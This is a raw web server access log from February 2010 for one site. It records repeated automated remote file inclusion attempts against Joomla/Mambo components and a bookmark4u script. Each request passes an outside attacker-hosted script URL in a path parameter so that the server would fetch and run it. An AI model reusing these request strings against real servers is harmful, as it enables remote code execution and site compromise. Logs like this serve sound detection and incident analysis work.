75.125.143.154 - - [11/Feb/2010:04:46:03 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:46:03 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:46:03 -0800] "GET /logs/access_100204.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:46:07 -0800] "GET /logs/access_100114.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:46:10 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:46:10 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:46:10 -0800] "GET /logs/access_100110.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:46:15 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:46:15 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:46:15 -0800] "GET /logs/access_100110.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:04:46:19 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:04:46:19 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:04:46:20 -0800] "GET /logs/access_100112.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:46:24 -0800] "GET /logs/access_100110.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:46:24 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:46:24 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:46:25 -0800] "GET /logs/access_100111.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:46:28 -0800] "GET /logs/access_100204.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:46:28 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:04:46:29 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:04:46:29 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:04:46:29 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:46:30 -0800] "GET /logs/access_100111.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:46:32 -0800] "GET /logs/access_100111.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:04:46:33 -0800] "GET /logs/access_100123.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:46:33 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:04:46:44 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://qqe.ru/forum/bj.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:04:46:46 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://qqe.ru/forum/bj.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
8.7.26.27 - - [11/Feb/2010:04:46:47 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://jireh.or.kr/images/pastor_index_.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
8.7.26.27 - - [11/Feb/2010:04:46:47 -0800] "GET /logs/access_100126.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://jireh.or.kr/images/pastor_index_.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
8.7.26.27 - - [11/Feb/2010:04:46:47 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://jireh.or.kr/images/pastor_index_.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.23.18.60 - - [11/Feb/2010:04:46:58 -0800] "GET /logs/access_100204.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:47:30 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:47:30 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:47:30 -0800] "GET /logs/access_100204.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:47:46 -0800] "GET /logs/access_100114.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:47:55 -0800] "GET /logs/access_100114.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:47:59 -0800] "GET /logs/access_100114.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:47:59 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:47:59 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:47:59 -0800] "GET /logs/access_100204.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:48:02 -0800] "GET /logs/access_091231.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:48:20 -0800] "GET /logs/access_100110.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:04:48:25 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:04:48:25 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:48:28 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:48:28 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:48:28 -0800] "GET /logs/access_100204.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:04:48:31 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:48:34 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:48:34 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:48:34 -0800] "GET /logs/access_091231.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:48:39 -0800] "GET /logs/access_100111.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:04:48:39 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:04:48:39 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:04:48:39 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.147.248 - - [11/Feb/2010:04:48:44 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tdos.org/images/log.png??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:49:01 -0800] "GET /logs/access_100128.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:04:50:10 -0800] "GET /logs/access_100201.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://qqe.ru/forum/bj.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:50:34 -0800] "GET /logs/access_100128.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:50:43 -0800] "GET /logs/access_100112.log/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:50:43 -0800] "GET /logs/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:50:44 -0800] "GET /index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:50:45 -0800] "GET /logs/access_100112.log/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:50:45 -0800] "GET /logs/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:50:46 -0800] "GET /index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:04:50:48 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:04:50:48 -0800] "GET /logs/access_100105.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:04:50:48 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:50:52 -0800] "GET /logs/access_100128.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:51:30 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:51:30 -0800] "GET /logs/access_100129.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:51:30 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:51:34 -0800] "GET /logs/access_100127.log/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:51:35 -0800] "GET /logs/access_100127.log/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:51:57 -0800] "GET /logs/access_100115.log/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:51:57 -0800] "GET /logs/access_100114.log/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:51:57 -0800] "GET /logs/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:51:57 -0800] "GET /index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:04:52:24 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:04:52:24 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:04:52:24 -0800] "GET /logs/access_100105.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.147.248 - - [11/Feb/2010:04:52:26 -0800] "GET /logs/access_100126.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tdos.org/images/log.png??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
110.45.147.248 - - [11/Feb/2010:04:52:27 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tdos.org/images/log.png??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
110.45.147.248 - - [11/Feb/2010:04:52:28 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tdos.org/images/log.png??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:52:44 -0800] "GET /logs/access_100126.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:52:53 -0800] "GET /logs/access_100111.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:53:17 -0800] "GET /logs/access_100115.log%20%20/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:53:18 -0800] "GET /logs/access_100115.log%20%20/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:53:25 -0800] "GET /logs/access_100114.log%20%20/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:53:25 -0800] "GET /logs/access_100105.log%20%20/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:53:27 -0800] "GET /logs/access_100114.log%20%20/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:53:27 -0800] "GET /logs/access_100105.log%20%20/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:04:53:32 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://qqe.ru/forum/bj.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:53:42 -0800] "GET /logs/access_100116.log%20%20/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:53:43 -0800] "GET /logs/access_100116.log%20%20/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:53:54 -0800] "GET /logs/access_100121.log%20%20/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:53:54 -0800] "GET /logs/access_100121.log%20%20/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:54:06 -0800] "GET /logs/access_100107.log%20%20/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:54:06 -0800] "GET /logs/access_100107.log%20%20/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:54:17 -0800] "GET /logs/access_100204.log%20%20/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:54:17 -0800] "GET /logs/access_100112.log%20%20/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:54:20 -0800] "GET /logs/access_100204.log%20%20/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:54:20 -0800] "GET /logs/access_100112.log%20%20/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
